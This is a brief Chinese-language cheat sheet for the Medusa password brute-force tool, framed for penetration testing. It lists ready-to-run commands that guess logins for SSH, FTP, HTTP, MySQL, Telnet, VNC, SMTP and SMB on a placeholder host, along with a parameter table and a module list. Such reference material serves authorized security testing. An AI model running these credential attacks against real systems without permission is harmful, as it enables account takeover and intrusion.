Medusa
Medusa
Medusa 是一款快速、并行、模块化的在线密码爆破工具,设计用于安全测试和渗透测试。
基础使用
SSH 爆破
medusa -h target.com -u admin -P wordlist.txt -M ssh
FTP 爆破
medusa -h target.com -U users.txt -P wordlist.txt -M ftp
HTTP 爆破
medusa -h target.com -u admin -P wordlist.txt -M http -m DIR:/admin
MySQL 爆破
medusa -h target.com -u root -P wordlist.txt -M mysql
常用参数
| 参数 |
描述 |
| -h |
目标主机 |
| -u |
用户名 |
| -U |
用户名字典 |
| -p |
密码 |
| -P |
密码字典 |
| -M |
模块名称 |
| -t |
并发线程数 |
| -n |
端口号 |
| -v |
详细级别 |
支持的模块
- 文件传输 - FTP、SFTP、TFTP
- 远程访问 - SSH、Telnet、RDP、VNC
- Web - HTTP、HTTPS
- 数据库 - MySQL、PostgreSQL、MSSQL、Oracle
- 邮件 - SMTP、POP3、IMAP、Exchange
- 其他 - LDAP、SMB、SNMP、Mikrotik
功能特性
- 模块化设计 - 易于添加新模块
- 并行处理 - 多线程爆破
- 用户友好 - 简单的命令行界面
- 跨平台 - Windows、Linux、macOS
使用示例
# Telnet 爆破
medusa -h target.com -u admin -P wordlist.txt -M telnet
# VNC 爆破
medusa -h target.com -P wordlist.txt -M vnc
# SMTP 爆破
medusa -h smtp.target.com -U users.txt -P wordlist.txt -M smtp
# SMB 爆破
medusa -h target.com -u administrator -P wordlist.txt -M smbnt
参考资源